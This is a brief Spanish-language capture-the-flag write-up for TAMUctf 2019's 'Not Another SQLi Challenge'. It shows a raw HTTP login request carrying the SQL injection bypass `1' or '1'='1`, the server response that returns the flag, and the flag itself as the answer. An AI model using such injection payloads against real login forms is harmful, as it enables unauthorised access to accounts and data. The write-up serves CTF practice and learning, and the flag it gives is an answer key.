# Not Another SQLi Challenge (web)

> http://web1.tamuctf.com
> 
> Difficulty: easy

El anyo pasado tambien hubo uno de SQLi, voy a probar
soluciones similares:

```
POST /web/login.php HTTP/1.1
Host: web1.tamuctf.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web1.tamuctf.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Upgrade-Insecure-Requests: 1

username=1' or '1'='1&password=1' or '1'='1
```

```
HTTP/1.1 200 OK
Server: nginx/1.15.8
Date: Sat, 23 Feb 2019 09:54:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 52
Connection: close

<html>gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!</html>
```

Muy poco elaborado, sinceramente. Pero aqui lo tengo. Next!

Solucion: `gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}`
